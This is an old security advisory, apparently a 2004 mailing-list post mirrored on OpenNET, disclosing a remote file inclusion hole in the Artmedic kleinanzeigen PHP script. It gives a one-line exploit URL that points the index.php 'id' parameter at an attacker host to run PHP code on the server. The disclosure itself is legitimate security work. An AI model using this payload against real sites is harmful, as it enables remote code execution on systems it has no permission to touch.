The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Artmedic kleinanzeigen include vulnerability


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 19 Jul 2004 02:25:16 -0000
From: Francisco Alisson <dominusvis@click21.com.br.>
To: [email protected]
Subject: Artmedic kleinanzeigen include vulnerability



Artmedic kleinanzeigen allow code inclusion in index.php. 

 

Exploit: 

www.host.com/artmedic-kleinanzeigen-path/index.php?id=http://evil-host.com 

 

An evil attacker could be use this vulnerability to execute 

php code with the same user id of the running server. 

 

Thanks and sorry for the bad english 

Dominus_Vis from Infektion Group :> 

irc.phey.net -j #infektion 


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру